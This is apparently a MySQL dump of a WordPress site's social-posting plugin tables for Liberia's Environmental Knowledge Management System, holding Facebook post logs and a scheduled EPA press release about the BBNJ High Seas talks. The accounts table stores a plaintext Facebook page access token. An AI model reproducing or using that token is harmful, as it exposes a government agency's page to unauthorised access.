-- MySQL dump 10.13  Distrib 5.7.44, for Linux (x86_64)
--
-- Host: localhost    Database: ekmslib_site
-- ------------------------------------------------------
-- Server version	5.7.44

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_bit_social_accounts`
--

DROP TABLE IF EXISTS `wp_bit_social_accounts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_bit_social_accounts` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `custom_app_id` bigint(20) unsigned DEFAULT NULL,
  `profile_id` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `account_id` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `account_name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `details` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `platform` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `account_type` int(11) NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT '1',
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `custom_app_id` (`custom_app_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bit_social_accounts`
--

LOCK TABLES `wp_bit_social_accounts` WRITE;
/*!40000 ALTER TABLE `wp_bit_social_accounts` DISABLE KEYS */;
INSERT INTO `wp_bit_social_accounts` VALUES (1,NULL,'1658339385611512','108459580598172','Environmental Knowledge Management System','{\"user_name\":\"Ekms Liberia\",\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"account_type\":\"page\",\"category\":\"Government organization\",\"icon\":\"https:\\/\\/scontent-atl3-1.xx.fbcdn.net\\/v\\/t39.30808-1\\/239041971_566942984749827_4500051354234333466_n.jpg?stp=cp0_dst-jpg_s50x50_tt6&_nc_cat=103&ccb=1-7&_nc_sid=f907e8&_nc_eui2=AeH5dAi3VZOR2buL4ZaZ0LLRUiQwNWGIZ_tSJDA1YYhn-4aZgqJaU3_zuP65jXnPC7LoUD-qo-qTCQyUwAA3Nw9m&_nc_ohc=nW_qEzxgjJ8Q7kNvwHCETqP&_nc_oc=Adr3MQflTxeiHud_SKqgdEppg16J8mmMIvoat-JGajKPc8uTGDLdcXcqSruAn2uODXY&_nc_zt=24&_nc_ht=scontent-atl3-1.xx&edm=AJdBtusEAAAA&_nc_gid=PKh974whc6cVK_SjmU6saw&_nc_tpa=Q5bMBQFPWQSTeJMsXE_vBgWAtH6r04xe8I6nLM2f9mt4PzQ5coVWtZe0DlTMYgK2cXObWHckPGRJvyipTg&oh=00_AfyVTCRDoOS6UzsDawGSWJVFEnLt8T5uU-dMyTG2tSlT1Q&oe=69CBA4EB\",\"access_token\":\"EAA34rZAVpMtkBRJIfbRIodGKpjkQsBJUBjoQnMKWOsJSIkPyigPFGmpLmU5ydtQKqn9KlJHbLDyHyJLDoIKdqmJQW3vG6p0WTB8isM4PHwBgJ33T8CxNbcyqqdXpZAHLJyiNDPU11c7AYQXgrG95PhLFPNWftxH8q5TH1PPhdZBNgEhYLK2zRKEnBjuxIxOGAMZD\",\"generates_on\":1774577705}','facebook',1,1,'2026-03-27 07:17:06','2026-03-27 07:17:06');
/*!40000 ALTER TABLE `wp_bit_social_accounts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bit_social_ai_prompt_configs`
--

DROP TABLE IF EXISTS `wp_bit_social_ai_prompt_configs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_bit_social_ai_prompt_configs` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `type` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `platform` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `model` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `config` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `prompt` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `fallback_content` longtext COLLATE utf8mb4_unicode_520_ci,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bit_social_ai_prompt_configs`
--

LOCK TABLES `wp_bit_social_ai_prompt_configs` WRITE;
/*!40000 ALTER TABLE `wp_bit_social_ai_prompt_configs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bit_social_ai_prompt_configs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bit_social_custom_apps`
--

DROP TABLE IF EXISTS `wp_bit_social_custom_apps`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_bit_social_custom_apps` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `platform` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `credential` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT '1',
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bit_social_custom_apps`
--

LOCK TABLES `wp_bit_social_custom_apps` WRITE;
/*!40000 ALTER TABLE `wp_bit_social_custom_apps` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bit_social_custom_apps` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bit_social_groups`
--

DROP TABLE IF EXISTS `wp_bit_social_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_bit_social_groups` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT '1',
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bit_social_groups`
--

LOCK TABLES `wp_bit_social_groups` WRITE;
/*!40000 ALTER TABLE `wp_bit_social_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bit_social_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bit_social_groups_accounts`
--

DROP TABLE IF EXISTS `wp_bit_social_groups_accounts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_bit_social_groups_accounts` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `group_id` bigint(20) unsigned NOT NULL,
  `account_id` bigint(20) unsigned NOT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `group_id` (`group_id`),
  KEY `account_id` (`account_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bit_social_groups_accounts`
--

LOCK TABLES `wp_bit_social_groups_accounts` WRITE;
/*!40000 ALTER TABLE `wp_bit_social_groups_accounts` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bit_social_groups_accounts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bit_social_logs`
--

DROP TABLE IF EXISTS `wp_bit_social_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_bit_social_logs` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `schedule_id` bigint(20) unsigned DEFAULT NULL,
  `details` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `platform` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT '1',
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `schedule_id` (`schedule_id`)
) ENGINE=MyISAM AUTO_INCREMENT=46 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bit_social_logs`
--

LOCK TABLES `wp_bit_social_logs` WRITE;
/*!40000 ALTER TABLE `wp_bit_social_logs` DISABLE KEYS */;
INSERT INTO `wp_bit_social_logs` VALUES (1,1,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1272570518350481\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1272570518350481\"}','facebook',1,'2026-03-27 07:24:54','2026-03-27 07:24:54'),(2,2,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1272572731683593\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1272572731683593\"}','facebook',1,'2026-03-27 07:28:14','2026-03-27 07:28:14'),(3,3,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1272575298350003\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1272575298350003\"}','facebook',1,'2026-03-27 07:32:24','2026-03-27 07:32:24'),(4,4,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1272999998307533\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1272999998307533\"}','facebook',1,'2026-03-27 19:39:08','2026-03-27 19:39:08'),(5,5,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1273011054973094\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1273011054973094\"}','facebook',1,'2026-03-27 19:53:35','2026-03-27 19:53:35'),(6,6,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1273049691635897\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1273049691635897\"}','facebook',1,'2026-03-27 20:52:57','2026-03-27 20:52:57'),(7,7,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1273052158302317\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1273052158302317\"}','facebook',1,'2026-03-27 20:56:15','2026-03-27 20:56:15'),(8,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1288436550097211\"},\"post_id\":5859,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1288436550097211\"}','facebook',1,'2026-04-16 16:13:18','2026-04-16 16:13:18'),(9,8,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1288438893430310\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1288438893430310\"}','facebook',1,'2026-04-16 16:17:39','2026-04-16 16:17:39'),(10,9,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1288440833430116\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1288440833430116\"}','facebook',1,'2026-04-16 16:20:40','2026-04-16 16:20:40'),(11,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1293122752961924\"},\"post_id\":5865,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1293122752961924\"}','facebook',1,'2026-04-22 17:51:34','2026-04-22 17:51:34'),(12,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1293304359610430\"},\"post_id\":5868,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1293304359610430\"}','facebook',1,'2026-04-22 22:47:36','2026-04-22 22:47:36'),(13,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1293307422943457\"},\"post_id\":5872,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1293307422943457\"}','facebook',1,'2026-04-22 22:52:58','2026-04-22 22:52:58'),(14,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1293309772943222\"},\"post_id\":5875,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1293309772943222\"}','facebook',1,'2026-04-22 22:56:42','2026-04-22 22:56:42'),(15,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1293973329543533\"},\"post_id\":5878,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1293973329543533\"}','facebook',1,'2026-04-23 19:17:54','2026-04-23 19:17:54'),(16,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1298908619050004\"},\"post_id\":5881,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1298908619050004\"}','facebook',1,'2026-04-29 16:32:43','2026-04-29 16:32:43'),(17,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1298909775716555\"},\"post_id\":5884,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1298909775716555\"}','facebook',1,'2026-04-29 16:34:51','2026-04-29 16:34:51'),(18,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1321110296829836\"},\"post_id\":5902,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1321110296829836\"}','facebook',1,'2026-05-26 19:33:35','2026-05-26 19:33:35'),(19,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1321116076829258\"},\"post_id\":5906,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1321116076829258\"}','facebook',1,'2026-05-26 19:42:29','2026-05-26 19:42:29'),(20,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1321123586828507\"},\"post_id\":5910,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1321123586828507\"}','facebook',1,'2026-05-26 19:52:19','2026-05-26 19:52:19'),(21,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1324709576469908\"},\"post_id\":5930,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1324709576469908\"}','facebook',1,'2026-05-30 23:37:42','2026-05-30 23:37:42'),(22,10,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1324742229799976\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1324742229799976\"}','facebook',1,'2026-05-31 00:31:14','2026-05-31 00:31:14'),(23,11,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1324753653132167\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1324753653132167\"}','facebook',1,'2026-05-31 00:50:29','2026-05-31 00:50:29'),(24,12,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1333531725587693\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1333531725587693\"}','facebook',1,'2026-06-09 22:13:58','2026-06-09 22:13:58'),(25,13,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1333538068920392\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1333538068920392\"}','facebook',1,'2026-06-09 22:23:05','2026-06-09 22:23:05'),(26,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1333543578919841\"},\"post_id\":5945,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1333543578919841\"}','facebook',1,'2026-06-09 22:31:51','2026-06-09 22:31:51'),(27,14,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1333545492252983\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1333545492252983\"}','facebook',1,'2026-06-09 22:34:40','2026-06-09 22:34:40'),(28,15,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1338620105078855\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1338620105078855\"}','facebook',1,'2026-06-15 20:48:33','2026-06-15 20:48:33'),(29,16,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339302878343911\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339302878343911\"}','facebook',1,'2026-06-16 16:46:12','2026-06-16 16:46:12'),(30,17,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339315228342676\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339315228342676\"}','facebook',1,'2026-06-16 17:05:07','2026-06-16 17:05:07'),(31,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339679858306213\"},\"post_id\":5961,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339679858306213\"}','facebook',1,'2026-06-17 02:43:08','2026-06-17 02:43:08'),(32,18,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339682268305972\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339682268305972\"}','facebook',1,'2026-06-17 02:47:34','2026-06-17 02:47:34'),(33,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339686254972240\"},\"post_id\":5964,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339686254972240\"}','facebook',1,'2026-06-17 02:55:27','2026-06-17 02:55:27'),(34,19,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339687548305444\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339687548305444\"}','facebook',1,'2026-06-17 02:58:24','2026-06-17 02:58:24'),(35,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339690124971853\"},\"post_id\":5967,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339690124971853\"}','facebook',1,'2026-06-17 03:04:10','2026-06-17 03:04:10'),(36,20,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339691158305083\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339691158305083\"}','facebook',1,'2026-06-17 03:06:19','2026-06-17 03:06:19'),(37,21,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1339695898304609\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1339695898304609\"}','facebook',1,'2026-06-17 03:14:17','2026-06-17 03:14:17'),(38,22,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1340391494901716\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1340391494901716\"}','facebook',1,'2026-06-17 22:34:07','2026-06-17 22:34:07'),(39,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1340398018234397\"},\"post_id\":5975,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1340398018234397\"}','facebook',1,'2026-06-17 22:44:17','2026-06-17 22:44:17'),(40,23,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1340405614900304\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1340405614900304\"}','facebook',1,'2026-06-17 22:55:50','2026-06-17 22:55:50'),(41,24,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1340406141566918\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1340406141566918\"}','facebook',1,'2026-06-17 22:56:30','2026-06-17 22:56:30'),(42,25,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1341206481486884\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1341206481486884\"}','facebook',1,'2026-06-18 22:10:10','2026-06-18 22:10:10'),(43,26,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1341206634820202\"},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1341206634820202\"}','facebook',1,'2026-06-18 22:10:23','2026-06-18 22:10:23'),(44,NULL,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1341255858148613\"},\"post_id\":5986,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1341255858148613\"}','facebook',1,'2026-06-18 23:33:58','2026-06-18 23:33:58'),(45,27,'{\"account_id\":\"108459580598172\",\"account_name\":\"Environmental Knowledge Management System\",\"response\":{\"id\":\"108459580598172_1341259761481556\",\"post_supports_client_mutation_id\":true},\"post_id\":null,\"post_url\":\"https:\\/\\/fb.com\\/108459580598172_1341259761481556\"}','facebook',1,'2026-06-18 23:39:44','2026-06-18 23:39:44');
/*!40000 ALTER TABLE `wp_bit_social_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bit_social_schedules`
--

DROP TABLE IF EXISTS `wp_bit_social_schedules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_bit_social_schedules` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `config` longtext COLLATE utf8mb4_unicode_520_ci,
  `published_post_ids` longtext COLLATE utf8mb4_unicode_520_ci,
  `repeat_schedule` tinyint(1) NOT NULL DEFAULT '0',
  `schedule_type` tinyint(1) NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT '1',
  `cron_status` tinyint(1) NOT NULL DEFAULT '1',
  `started_at` timestamp NULL DEFAULT NULL,
  `ended_at` timestamp NULL DEFAULT NULL,
  `last_published_at` timestamp NULL DEFAULT NULL,
  `next_published_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=28 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bit_social_schedules`
--

LOCK TABLES `wp_bit_social_schedules` WRITE;
/*!40000 ALTER TABLE `wp_bit_social_schedules` DISABLE KEYS */;
INSERT INTO `wp_bit_social_schedules` VALUES (3,'EPA Boss Leads Liberia in Crucial UN High Seas Negotiations','{\"settings\":{\"name\":\"EPA Boss Leads Liberia in Crucial UN High Seas Negotiations\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"New York, March 23, 2026 \\u2014 The Government of Liberia is strengthening its voice on the global stage, with the Environmental Protection Agency (EPA) leading the country\\u2019s participation in key United Nations negotiations on the High Seas Treaty.\\n\\nLeading the Liberian delegation is EPA Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, who is representing the country at the Third Preparatory Commission (PrepCom III) of the Biodiversity Beyond National Jurisdiction (BBNJ) Agreement. The meeting, taking place from March 23 to April 2, 2026, marks a critical step toward operationalizing the High Seas Treaty.\\n\\nLiberia\\u2019s participation underscores the Government\\u2019s strong commitment to environmental protection, climate action, and international cooperation. The New York discussions are focused on establishing key systems that will guide how the agreement is implemented globally, including governance structures, financing mechanisms, and technical frameworks.\\n\\nDr. Yarkpawolo is joined by a team of experienced professionals, including Mr. Jestino Sharty Gaye of Liberia\\u2019s Permanent Mission in New York, Mr. Bohmensahn Yuan of the Liberia Maritime Authority, Mr. Joseph Charles of the EPA, among others, reflects a coordinated national approach to advancing Liberia\\u2019s interests on the global stage.\\n\\nThe ongoing negotiations are addressing critical areas such as the creation of marine protected areas, environmental impact assessments, data-sharing systems, and equitable access to benefits derived from marine genetic resources. These discussions are expected to shape how countries collaborate to protect biodiversity in areas beyond national jurisdiction.\\n\\nFor Liberia, the BBNJ Agreement presents significant opportunities. The process opens doors to increased access to international climate finance, technical support, and scientific collaboration, particularly in ocean research, marine resource management, and blue economy development.\\n\\nThe Government of Liberia views this engagement as a strategic opportunity to strengthen national capacity, attract investment, and ensure that the country benefits from emerging global systems tied to ocean resources.\\n\\nAt the same time, Liberia\\u2019s active participation demonstrates its commitment to ensuring that the voices and interests of developing countries are well represented in global decision-making processes.\\n\\nAs the world moves toward implementing the High Seas Treaty, Liberia remains focused on aligning its national priorities with international frameworks, promoting sustainable development, and safeguarding its natural resources for present and future 